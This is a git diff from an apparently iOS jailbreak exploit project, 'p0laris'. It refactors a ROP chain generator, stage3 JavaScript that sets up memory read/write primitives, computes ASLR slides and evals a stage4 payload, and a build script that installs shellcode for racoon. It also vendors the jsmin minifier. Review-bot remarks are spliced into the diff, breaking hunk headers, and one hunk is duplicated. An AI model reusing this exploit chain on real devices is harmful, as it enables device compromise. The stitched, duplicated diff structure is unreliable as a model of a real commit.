| -rw-r--r-- | .gitignore | 4 | ||||
| -rwxr-xr-x | build_native.sh | 10 | ||||
| -rw-r--r-- | src/gen/stage2.c | 7 | ||||
| -rw-r--r-- | src/js/main.js | 23 | ||||
| -rw-r--r-- | src/js/primitives/mem.js | 2 | ||||
| -rw-r--r-- | src/stage4/main.js | 7 | ||||
| -rw-r--r-- | stage4.js | 7 | ||||
| -rwxr-xr-x | tools/build_native.sh | 6 | ||||
| -rw-r--r-- | tools/jsmin.c | 319 |
9 files changed, 363 insertions, 22 deletions
@@ -15,4 +15,6 @@ exp.js racoon.conf
-.vscode
\ No newline at end of file
+.vscode
+
+exp_unmin.js
\ No newline at end of file
diff --git a/build_native.sh b/build_native.sh
index a2f2a3b..fee1a7b 100755
--- a/build_native.sh
+++ b/build_native.sh
@@ -1,9 +1,11 @@
 #!/bin/bash
-rm exp.js
-find src/js -name '*.js' -exec cat {} \; >> exp.js
-echo >> exp.js
-echo "main();" >> exp.js
+rm exp_unmin.js
+find src/js -name '*.js' -exec cat {} \; >> exp_unmin.js
+echo >> exp_unmin.js
+echo "main();" >> exp_unmin.js
+
+cat exp_unmin.js | tools/bin/jsmin > exp.js
 rm stage4.js
 find src/stage4 -name '*.js' -exec cat {} \; >> stage4.js
diff --git a/src/gen/stage2.c b/src/gen/stage2.c
index 63dccc1..1b18d16 100644
--- a/src/gen/stage2.c
+++ b/src/gen/stage2.c
@@ -281,13 +281,14 @@ rop_chain_shit gen_rop_chain(uint32_t base,
 // CALL_4_ARG_L2_0(base + 0x9ad8c, LOG_SYSLOG, base + we_out_here_addr);
- /* allocate memory for file read later */
+/*
+ /* allocate memory for file read later *\/
 CALL_1ARG(base + malloc_addr, 0x100000);
 STR_R0(base + reserve_addr);
 MOV_R1_R0();
- /* output malloc string */
- CALL_1ARG(base + printf_addr, base + malloc_status_addr);
+ /* output malloc string *\/
+ CALL_1ARG(base + printf_addr, base + malloc_status_addr);*/
 /* calculate dyld_shared_cache slide */
 MOV_R0(0 - (0x20000000 + scprefcreate_dsc_offset));
diff --git a/src/js/main.js b/src/js/main.js
index 905c4ef..6c1c9a5 100644
--- a/src/js/main.js
+++ b/src/js/main.js
@@ -48,7 +48,8 @@ var kCFBooleanFalse;
 var kCFPreferencesAnyUser;
 var kCFPreferencesCurrentHost;
 var kIOMasterPortDefault = NULL;
-var options = {};
+var p0laris = {};
+p0laris.options = {};
 var sanity_port = 0;
 var MACH_PORT_RIGHT_RECEIVE = 0x1;
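Review bot: The new pipeline `cat exp_unmin.js | tools/bin/jsmin > exp.js` has no failure handling: jsmin's `error()` (see tools/jsmin.c in this commit) exits 1 on an unterminated comment, string or regex literal, but the script has no `set -e`/`set -o pipefail`, so a minifier failure leaves a partially written `exp.js` and the build carries on with it. Adding `set -euo pipefail` after the shebang and dropping the useless `cat`, `tools/bin/jsmin < exp_unmin.js > exp.js`, makes that failure stop the build. `rm exp_unmin.js` without `-f` also prints an error on a fresh checkout; `rm -f exp_unmin.js` is the usual spelling.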
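Review bot: The disabled region is wrapped in a new outer `/*` ... `*/` and the inner comment terminators are rewritten as `*\/`, which only works because `*\/` happens not to be a comment terminator, and the `/*` sequences now inside a comment trigger `-Wcomment` warnings; anyone restoring a single inner `*/` later silently re-enables the rest of the block. Wrapping the region in `#if 0` / `#endif` disables it without editing the inner comments and is the conventional form. The enclosing gen_rop_chain() body starts and ends outside the hunk.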
@@ -97,11 +98,16 @@ function parse_nvram_options() {
 for (var i = 0; i < p0laris_options_buf.length; i++) {
 p0laris_options_js_str += String.fromCharCode(p0laris_options_buf[i]);
 }
- options = JSON.parse(p0laris_options_js_str);
+ p0laris.options = JSON.parse(p0laris_options_js_str);
 }
 }
 }
+function p0laris_object_general() {
+ p0laris.dyld_shc_slide = get_dyld_shc_slide();
+ p0laris.racoon_slide = get_our_slide();
+}
+
 function main() {
 /*
 * get slide and calculate slid base
@@ -121,16 +127,16 @@ function main() {
 syslog(LOG_SYSLOG, "we out here");
 syslog(LOG_SYSLOG, "stage3");
- puts("we out here");
- puts("I came through a portal holding a 40 and a blunt. Do you really wanna test me right now?");
-
- var dyld_shc_slide = get_dyld_shc_slide();
+ puts("[*] we out here");
+ puts("[*] landed in stage3");
 setup_fancy_rw();
 parse_nvram_options();
+
+ p0laris_object_general();
- if (options["sleep_spin"] === true) {
+ if (p0laris.options.sleep_spin === true) {
 while (1) {
 sleep(3600);
 }
@@ -138,6 +144,7 @@ function main() {
 var stage4_bin = malloc(0x400000);
+ printf("[*] loading stage4...\n");
 var fd = open("/var/root/stage4.js", O_RDONLY, 0);
 var bytes_read = read(fd, stage4_bin, 0x400000);
 var stage4_bin_buf = read_buf(stage4_bin, bytes_read);
@@ -146,7 +153,7 @@ function main() {
 stage4_js_str += String.fromCharCode(stage4_bin_buf[i]);
 }
- printf("stage4 time baby\n");
+ printf("[*] entering stage4...\n");
 eval(stage4_js_str);
 exit(main());
diff --git a/src/js/primitives/mem.js b/src/js/primitives/mem.js
index d664e7b..f6a0f8b 100644
--- a/src/js/primitives/mem.js
+++ b/src/js/primitives/mem.js
@@ -226,7 +226,7 @@ function init_sptr_heap() {
 sptr_size = 0x1000000;
 sptr_len = 0;
- calls4arg("printf\0", sptr("sptr_heap=%p\n"), global_sptr_addy, 0, 0);
+ calls4arg("printf\0", sptr("[*] sptr_heap=%p\n"), global_sptr_addy, 0, 0);
 return global_sptr_addy;
 }
diff --git a/src/stage4/main.js b/src/stage4/main.js
index 4947a77..328bb0a 100644
--- a/src/stage4/main.js
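Review bot: `p0laris.options = JSON.parse(p0laris_options_js_str);` parses data that is only read back from storage at runtime (presumably NVRAM, going by the function name), and a malformed blob throws here with no handler, aborting parse_nvram_options() and everything main() does after it; parse_nvram_options() begins outside the hunk. Wrapping the parse keeps the `{}` default that the earlier hunk assigns: `try { p0laris.options = JSON.parse(p0laris_options_js_str); } catch (e) { puts("[!] bad options JSON, using defaults"); }`. The new `p0laris_object_general()` also deserves a one-line comment saying it fills `p0laris.dyld_shc_slide` and `p0laris.racoon_slide`, since the name does not say what "general" covers.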
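Review bot: The removed `var dyld_shc_slide = get_dyld_shc_slide();` has no replacement local in main(); the value now exists only as `p0laris.dyld_shc_slide`, set by `p0laris_object_general()`. If any later line of main() still reads the old local (the function continues past this hunk), that read becomes a ReferenceError at runtime, so the rest of main() should be checked for `dyld_shc_slide` before merging. `p0laris_object_general()` is also placed after `setup_fancy_rw()` and `parse_nvram_options()`; if the slide lookups depend on that ordering, a comment such as `// must run after setup_fancy_rw()` on the call would keep a future reorder from breaking it.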
+++ b/src/stage4/main.js
@@ -1,6 +1,9 @@
 function main() {
- printf("landed in stage4\n");
- syslog(LOG_SYSLOG, "we out here in stage 4");
+ printf("[*] landed in stage4\n");
+ syslog(LOG_SYSLOG, "we out here");
+
+ printf("[*] p0laris.dyld_shc_slide=0x%08x\n", p0laris.dyld_shc_slide);
+ printf("[*] p0laris.racoon_slide=0x%08x\n", p0laris.racoon_slide);
 return 0;
 }
\ No newline at end of file
@@ -1,6 +1,9 @@
 function main() {
- printf("landed in stage4\n");
- syslog(LOG_SYSLOG, "we out here in stage 4");
+ printf("[*] landed in stage4\n");
+ syslog(LOG_SYSLOG, "we out here");
+
+ printf("[*] p0laris.dyld_shc_slide=0x%08x\n", p0laris.dyld_shc_slide);
+ printf("[*] p0laris.racoon_slide=0x%08x\n", p0laris.racoon_slide);
 return 0;
 }
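Review bot: `syslog(LOG_SYSLOG, "we out here");` now emits exactly the string stage3 already logs in src/js/main.js (`syslog(LOG_SYSLOG, "we out here");`), so the syslog stream no longer tells the two stages apart where the old text `"we out here in stage 4"` did; `syslog(LOG_SYSLOG, "stage4");` would mirror the `"stage3"` line stage3 emits and keep the two distinguishable. The two new printf lines read `p0laris.dyld_shc_slide` and `p0laris.racoon_slide` from a global this file never declares; it only resolves because src/js/main.js evals stage4.js in its own scope, and a comment such as `// p0laris is populated by stage3 (src/js/main.js) before this file is eval'd` would record that dependency for whoever next edits either build.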
\ No newline at end of file
diff --git a/tools/build_native.sh b/tools/build_native.sh
index 2290017..6957f43 100755
--- a/tools/build_native.sh
+++ b/tools/build_native.sh
@@ -31,4 +31,8 @@ chmod 777 /etc/racoon/shellcode.bin
 rm bin/jit_all_the_things
 gcc jit_all_the_things.c -o bin/jit_all_the_things --std=c99 -marm -fPIC
-ldid -Sent.xml bin/jit_all_the_things
\ No newline at end of file
+ldid -Sent.xml bin/jit_all_the_things
+
+rm bin/jsmin
+gcc jsmin.c -o bin/jsmin --std=c99
+ldid -S bin/jsmin
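Review bot: `rm bin/jsmin` runs without `-f`, so on a fresh clone where `bin/jsmin` does not exist yet it prints an error, and since the hunk shows no `set -e` (the script header is outside it) a failed `gcc jsmin.c -o bin/jsmin --std=c99` is still followed by `ldid -S bin/jsmin` on a missing file and the top-level build then pipes through a minifier that was never built. `rm -f bin/jsmin` and `gcc -std=c99 -Wall jsmin.c -o bin/jsmin` (single-dash `-std` is the documented spelling, and `-Wall` makes any warnings from the vendored minifier visible) are the minimal changes, with `set -e` at the top of the script if it is not already there. The same unguarded `rm` appears in the top-level build_native.sh hunk (`rm exp_unmin.js`).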
\ No newline at end of file
diff --git a/tools/jsmin.c b/tools/jsmin.c
new file mode 100644
index 0000000..1582450
--- /dev/null
+++ b/tools/jsmin.c
@@ -0,0 +1,319 @@ +/* jsmin.c + 2019-10-30 + +Copyright (C) 2002 Douglas Crockford (www.crockford.com) + +Permission is hereby granted, free of charge, to any person obtaining a copy of +this software and associated documentation files (the "Software"), to deal in +the Software without restriction, including without limitation the rights to +use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies +of the Software, and to permit persons to whom the Software is furnished to do +so, subject to the following conditions: + +The above copyright notice and this permission notice shall be included in all +copies or substantial portions of the Software. + +The Software shall be used for Good, not Evil. + +THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR +IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, +FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE +AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER +LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, +OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE +SOFTWARE. +*/ + +#include <stdlib.h> +#include <stdio.h> + +static int the_a; +static int the_b; +static int look_ahead = EOF; +static int the_x = EOF; +static int the_y = EOF; + + +static void error(char* string) { + fputs("JSMIN Error: ", stderr); + fputs(string, stderr); + fputc('\n', stderr); + exit(1); +} + +/* is_alphanum -- return true if the character is a letter, digit, underscore, + dollar sign, or non-ASCII character. +*/ + +static int is_alphanum(int codeunit) { + return ( + (codeunit >= 'a' && codeunit <= 'z') + || (codeunit >= '0' && codeunit <= '9') + || (codeunit >= 'A' && codeunit <= 'Z') + || codeunit == '_' + || codeunit == '$' + || codeunit == '\\' + || codeunit > 126 + ); +} + + +/* get -- return the next character from stdin. Watch out for lookahead. 
If + the character is a control character, translate it to a space or + linefeed. +*/ + +static int get() { + int codeunit = look_ahead; + look_ahead = EOF; + if (codeunit == EOF) { + codeunit = getc(stdin); + } + if (codeunit >= ' ' || codeunit == '\n' || codeunit == EOF) { + return codeunit; + } + if (codeunit == '\r') { + return '\n'; + } + return ' '; +} + + +/* peek -- get the next character without advancing. +*/ + +static int peek() { + look_ahead = get(); + return look_ahead; +} + + +/* next -- get the next character, excluding comments. peek() is used to see + if a '/' is followed by a '/' or '*'. +*/ + +static int next() { + int codeunit = get(); + if (codeunit == '/') { + switch (peek()) { + case '/': + for (;;) { + codeunit = get(); + if (codeunit <= '\n') { + break; + } + } + break; + case '*': + get(); + while (codeunit != ' ') { + switch (get()) { + case '*': + if (peek() == '/') { + get(); + codeunit = ' '; + } + break; + case EOF: + error("Unterminated comment."); + } + } + break; + } + } + the_y = the_x; + the_x = codeunit; + return codeunit; +} + + +/* action -- do something! What you do is determined by the argument: + 1 Output A. Copy B to A. Get the next B. + 2 Copy B to A. Get the next B. (Delete A). + 3 Get the next B. (Delete B). + action treats a string as a single character. + action recognizes a regular expression if it is preceded by the likes of + '(' or ',' or '='. 
+*/ + +static void action(int determined) { + switch (determined) { + case 1: + putc(the_a, stdout); + if ( + (the_y == '\n' || the_y == ' ') + && (the_a == '+' || the_a == '-' || the_a == '*' || the_a == '/') + && (the_b == '+' || the_b == '-' || the_b == '*' || the_b == '/') + ) { + putc(the_y, stdout); + } + case 2: + the_a = the_b; + if (the_a == '\'' || the_a == '"' || the_a == '`') { + for (;;) { + putc(the_a, stdout); + the_a = get(); + if (the_a == the_b) { + break; + } + if (the_a == '\\') { + putc(the_a, stdout); + the_a = get(); + } + if (the_a == EOF) { + error("Unterminated string literal."); + } + } + } + case 3: + the_b = next(); + if (the_b == '/' && ( + the_a == '(' || the_a == ',' || the_a == '=' || the_a == ':' + || the_a == '[' || the_a == '!' || the_a == '&' || the_a == '|' + || the_a == '?' || the_a == '+' || the_a == '-' || the_a == '~' + || the_a == '*' || the_a == '/' || the_a == '{' || the_a == '}' + || the_a == ';' + )) { + putc(the_a, stdout); + if (the_a == '/' || the_a == '*') { + putc(' ', stdout); + } + putc(the_b, stdout); + for (;;) { + the_a = get(); + if (the_a == '[') { + for (;;) { + putc(the_a, stdout); + the_a = get(); + if (the_a == ']') { + break; + } + if (the_a == '\\') { + putc(the_a, stdout); + the_a = get(); + } + if (the_a == EOF) { + error( + "Unterminated set in Regular Expression literal." + ); + } + } + } else if (the_a == '/') { + switch (peek()) { + case '/': + case '*': + error( + "Unterminated set in Regular Expression literal." + ); + } + break; + } else if (the_a =='\\') { + putc(the_a, stdout); + the_a = get(); + } + if (the_a == EOF) { + error("Unterminated Regular Expression literal."); + } + putc(the_a, stdout); + } + the_b = next(); + } + } +} + + +/* jsmin -- Copy the input to the output, deleting the characters which are + insignificant to JavaScript. Comments will be removed. Tabs will be + replaced with spaces. Carriage returns will be replaced with linefeeds. 
+ Most spaces and linefeeds will be removed. +*/ + +static void jsmin() { + if (peek() == 0xEF) { + get(); + get(); + get(); + } + the_a = '\n'; + action(3); + while (the_a != EOF) { + switch (the_a) { + case ' ': + action( + is_alphanum(the_b) + ? 1 + : 2 + ); + break; + case '\n': + switch (the_b) { + case '{': + case '[': + case '(': + case '+': + case '-': + case '!': + case '~': + action(1); + break; + case ' ': + action(3); + break; + default: + action( + is_alphanum(the_b) + ? 1 + : 2 + ); + } + break; + default: + switch (the_b) { + case ' ': + action( + is_alphanum(the_a) + ? 1 + : 3 + ); + break; + case '\n': + switch (the_a) { + case '}': + case ']': + case ')': + case '+': + case '-': + case '"': + case '\'': + case '`': + action(1); + break; + default: + action( + is_alphanum(the_a) + ? 1 + : 3 + ); + } + break; + default: + action(1); + break; + } + } + } +} + + +/* main -- Output any command line arguments as comments + and then minify the input. +*/ + +extern int main(int argc, char* argv[]) { + int i; + for (i = 1; i < argc; i += 1) { + fprintf(stdout, "// %s\n", argv[i]); + } + jsmin(); + return 0; +}
\ No newline at end of file |
